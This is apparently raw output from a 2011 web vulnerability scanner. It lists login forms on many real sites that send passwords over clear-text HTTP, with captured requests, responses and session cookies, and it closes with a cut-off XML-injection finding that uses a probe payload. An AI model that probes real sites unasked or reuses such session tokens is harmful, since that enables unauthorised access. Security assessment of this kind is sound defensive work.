Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977
GET /NA7/ats/careers/jobSearch.jsp?org=VIBRANT&cws=1 HTTP/1.1
Host: tbe.taleo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:21 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm; Path=/NA7/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10486
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.bibsonomy.org/login_internal
The form contains the following password field:
password
Request
GET / HTTP/1.1
Host: www.bibsonomy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org
X-Pingback: http://scraper.bibsonomy.org/xmlrpc
Set-Cookie: JSESSIONID=69F28CAB61CBF1AC490EAB83BB7E82F5; Path=/
Connection: close
Content-Length: 61584
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.coe.gatech.edu/home?destination=home
The form contains the following password field:
pass
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=_8zhn; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:46 GMT Content-Length: 30973
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.jazdtech.com/techdirect/
The form contains the following password field:
password
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
GET /bookmarks.php/ HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:59 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94655
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/bookmarks.php/" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php?return=/buttons.php
The form contains the following password field:
password
Request
GET /buttons.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:24 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55482
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/buttons.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php?return=/groups.php
The form contains the following password field:
password
Request
GET /groups.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:26 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 38173
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/groups.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
GET /impressum.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:27 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/impressum.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php
The form contains the following password field:
password
Request
GET /login.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:13 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php
The form contains the following password field:
password
Request
GET /login.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:13 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... <div class="login-left"> <form action="/login.php" id="thisform" method="post"> <h2> ...[SNIP]... <br /> <input type="password" name="password" class="login" tabindex="11" /><br /> ...[SNIP]...
GET /topusers.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:34 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49739
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/topusers.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.linkagogo.com/go/Authenticate
The form contains the following password field:
code
Request
GET / HTTP/1.1 Host: www.linkagogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:32 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4 Last-Modified: Thu, 27 Jan 2011 16:40:09 GMT ETag: "7151cc-5bca-49ad69a490c40" Accept-Ranges: bytes Content-Length: 23498 Connection: close Content-Type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.linkatopia.com/login
The form contains the following password field:
a2
Request
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:02 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
GET / HTTP/1.1 Host: www.migrationexpertzone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.myfitnesspal.com/account/login
The form contains the following password field:
password
Request
GET /nutrition-facts-calories/bjs HTTP/1.1 Host: www.myfitnesspal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.mylinkvault.com/users/register.php
The form contains the following password fields:
password
password_chk
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
GET / HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=ekde4uf6o3m1pae1sfc1dc4f16; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38134
GET /index.php HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:54 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=3ugqie5obq0npitc2bvsin2tr7; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38158
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://my.nowpublic.com/user/login
The form contains the following password field:
pass
Request
GET / HTTP/1.1 Host: www.nowpublic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:54 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n34), ht iad-agg-n34.panthercdn.com ETag: "ded758d99458fa48f10bde897667d88d" Cache-Control: max-age=360 Expires: Sat, 05 Feb 2011 23:07:58 GMT Age: 56 Content-Length: 86152 Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 05 Feb 2011 22:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
GET / HTTP/1.1 Host: www.ortho.hyperguides.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:07:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: Developers B.S.A.T Etag: "" X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.10 Set-Cookie: af696fa0a123e22c58825b15193298d6=h3g6udk5uu72jmpmg705t2a1r2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ohg=1; expires=Sun, 06-Feb-2011 22:07:19 GMT Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 43934
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ota.org/members_only/login_menu.cfm
The form contains the following password field:
customer
Request
GET /members_only/login_menu.cfm HTTP/1.1 Host: www.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><!-- InstanceBegin template="/Templates/index.dwt" codeOutsideHTMLIsLocke ...[SNIP]... <td>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.peppernews.eu/login.php?return=/
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.peppernews.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:10:56 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=karceondeao8d2ilt1nprqs6k45brt7e; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 75079
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.spiele365.com/login.php?return=%2F
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.spiele365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:14:22 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=1u37onl8uc70chts4qpd19rr0935a9tv; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 24726
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.stumbleupon.com/login.php
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Mon, 06-Feb-2012 16:03:33 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 06 Feb 2011 16:03:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40429
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.technotizie.it/login-inside.php
The form contains the following password field:
pass2
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.technotizie.it/register-rev1.php
The form contains the following password field:
user_pass
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.tumblr.com/register
The form contains the following password field:
user[password]
Request
GET / HTTP/1.1 Host: www.tumblr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:16:04 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" Vary: Accept-Encoding X-Tumblr-Usec: D=38877 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.tumblr.com/login
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.tumblr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:16:04 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" Vary: Accept-Encoding X-Tumblr-Usec: D=38877 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www1.hilton.com/en_US/hi/index.do
The form contains the following password field:
password
Request
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose that the relevant input serves within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
